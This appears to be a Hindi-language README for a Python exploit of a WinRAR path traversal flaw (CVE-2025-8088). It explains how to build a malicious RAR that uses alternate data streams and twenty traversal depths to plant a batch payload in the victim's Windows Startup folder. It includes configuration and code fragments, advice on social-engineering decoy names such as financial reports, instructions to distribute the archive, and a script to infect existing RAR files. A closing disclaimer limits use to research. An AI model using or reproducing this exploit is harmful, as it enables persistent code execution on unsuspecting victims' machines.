
पुराने WinRAR का उपयोग करके सिस्टम का शोषण करें बिना उनके उपयोगकर्ता नाम जाने (अन्य परियोजनाओं के विपरीत)


यह Python स्क्रिप्ट WinRAR में एक पथ ट्रैवर्सल कमजोरी (CVE-2025-8088) का शोषण करती है ताकि विंडोज स्टार्टअप फ़ोल्डर में एकाधिक सापेक्ष पथ गहराइयों का उपयोग करके पेलोड तैनात किए जा सकें। यह शोषण एक दुर्भावनापूर्ण RAR संग्रह बनाता है जो निकाले जाने पर पीड़ित के स्टार्टअप फ़ोल्डर में विभिन्न निर्देशिका गहराइयों पर पेलोड लिखता है।
स्क्रिप्ट एकाधिक डिकॉय फ़ाइलें (डिफ़ॉल्ट रूप से 20) बनाती है, प्रत्येक को मूल निर्देशिकाओं की एक अलग संख्या को पार करने के लिए कॉन्फ़िगर किया गया है:
NUM_DEPTHS = 20 # विभिन्न ट्रैवर्सल गहराइयों की संख्या
प्रत्येक फ़ाइल एक अलग पथ गहराई का उपयोग करती है:
File1.txt → ..\Startup\payload.bat
File2.txt → ..\..\Startup\payload.bat
...
File20.txt → ..\..\..\ (20 बार) \Startup\payload.bat
✅ सुनिश्चित करता है कि पीड़ित संग्रह को कहीं भी निकाले (डेस्कटॉप, दस्तावेज़, डाउनलोड, या नेस्टेड फ़ोल्डर), कम से कम एक पेलोड स्टार्टअप फ़ोल्डर तक पहुँचेगा।
डिकॉय फ़ाइलों में डिफ़ॉल्ट रूप से सामान्य पाठ होता है लेकिन यथार्थवादी सोशल इंजीनियरिंग के लिए उन्हें अनुकूलित किया जाना चाहिए:
# अधिक ठोस डिकॉय सामग्री बनाएँ
decoy.write_text("Quarterly Financial Report Q3 2025.docx\n", encoding="utf-8")
डिकॉय सामग्री क्यों बदलें?
पेलोड डिफ़ॉल्ट रूप से एक सरल बैच स्क्रिप्ट है लेकिन इसे किसी भी निष्पादन योग्य से बदला जा सकता है:
PAYLOAD = "@echo off\necho Payload executed!\npause\n"
पेलोड स्थान:
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.bat
अंतिम दुर्भावनापूर्ण RAR संग्रह इस प्रकार सहेजा जाता है:
OUT_RAR = "exploit.rar"
इस शोषण उत्पादन के लिए कई कारणों से विंडोज वातावरण की आवश्यकता होती है:
वैकल्पिक डेटा स्ट्रीम (ADS) निर्भरता NTFS-विशिष्ट सुविधा जिसका उपयोग पेलोड संलग्न करने के लिए किया जाता है:
ads_path = f"{decoy}:{placeholder}" # विंडोज-विशिष्ट NTFS सिंटैक्स
WinRAR निष्पादन योग्य आवश्यकता WinRAR की Windows CLI का उपयोग करता है:
subprocess.run(f'"{rar_exe}" a -ep -os "{base_rar}" ...')
पथ संरचना अनुकूलता विंडोज-विशिष्ट पथों को लक्षित करता है:
RELATIVE_DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu..."
पेलोड निष्पादन विंडोज बैच फ़ाइलें उत्पन्न करता है:
@echo off
start /B notepad.exe
कॉन्फ़िगरेशन को अनुकूलित करें:
# कॉन्फ़िगरेशन
NUM_DEPTHS = 20
RELATIVE_DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B notepad.exe\n" # आपका वास्तविक पेलोड
DECOY_FILE_PREFIX = "Financial_Report_Q3_" # अधिक ठोस नाम
स्क्रिप्ट चलाएँ:
python CVE-2025-8088.py
आउटपुट वितरित करें:
exploit.rar उत्पन्न करती हैकोड का यह संस्करण आपको निम्नलिखित प्रकार से चलाने की अनुमति देता है
python3 infect_premade_rarfiles.py website_backup.rar
यह सभी फ़ाइलों को निकालेगा, जिनमें वे फ़ाइलें शामिल हैं जिनमें यह कर सकता है जैसे .txt, srt, sql (सभी फ़ाइल प्रकार काम नहीं करते) फिर तैयार चलाने योग्य rar फ़ाइल बनाएगा।
⚠️ यह उपकरण केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना इसे कभी भी सिस्टम के विरुद्ध उपयोग न करें। अनधिकृत उपयोग अवैध और अनैतिक है।